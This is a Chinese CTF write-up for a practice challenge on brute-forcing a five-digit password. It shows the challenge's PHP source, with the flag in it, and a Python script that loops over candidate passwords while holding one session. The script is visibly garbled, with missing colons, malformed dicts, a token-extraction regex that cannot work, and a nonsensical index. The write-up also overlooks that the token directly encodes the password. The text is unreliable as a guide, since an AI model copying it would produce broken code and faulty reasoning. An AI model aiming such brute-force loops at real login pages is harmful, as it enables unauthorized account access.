GJCTF模拟题之python暴力破解网站管理员密码

题目地址：http://www.czlgjbbq.top/GJCTF/brute.php

php源码：

<?php
error_reporting(0);
session_start();
if(empty($_COOKIE['f14g']) || empty($_SESSION['token'])){
    $rand_number = rand(10000,99999);
    setcookie('f14g',1);
    $_SESSION['token'] = base64_encode(base64_encode($rand_number));
}
echo "当前session值:".$_SESSION['token'];
?>
    <html>
    <head><title>你能进来吗？</title></head>
    <body>
    <form action="./brute.php" method="GET">
        <input type="text" name="password" placeholder="请输入五位数密码!" value="">
        <input type="hidden" name="check" value="<?php echo $_SESSION['token'];?>">
        <input type="submit" name="submit" value="提交">
    </form>
    </body>
    </html>


<?php
if($_SESSION['token'] == $_GET['check']){
    $password = $_GET['password'];
    echo $password;
    if($password == base64_decode(base64_decode($_SESSION['token']))){
        echo "flag:GJCTF{anjjPONFAkg};";
    }else{
        echo "error!";
    }
}else{
    echo "session error!";
}

?>

根据源码可以看出我们可以固定session值来避免session值的刷新从而避免密码的变更。
所以这里我们使用python脚本，并使用requests.session库来避免session值的刷新以导致后台管理员密码的刷新。

python脚本：

import requests
import re
s = requests.session()
html = s.get('http://www.czlgjbbq.top/GJCTF/brute.php')
pattern = '.html'
ss = re.search(pattern, html.text)
session = ss.group()[1-6]
#print session
for i in range(10000,99999)
    payload = {'password' str(i), 'check' session}
    #print payload
    html = s.get(url='http://www.czlgjbbq.top/GJCTF/brute.php', params=payload)
    pattern = 'GJCTF'
    if not re.match(pattern,html.text)
        pass
    else
        print html.text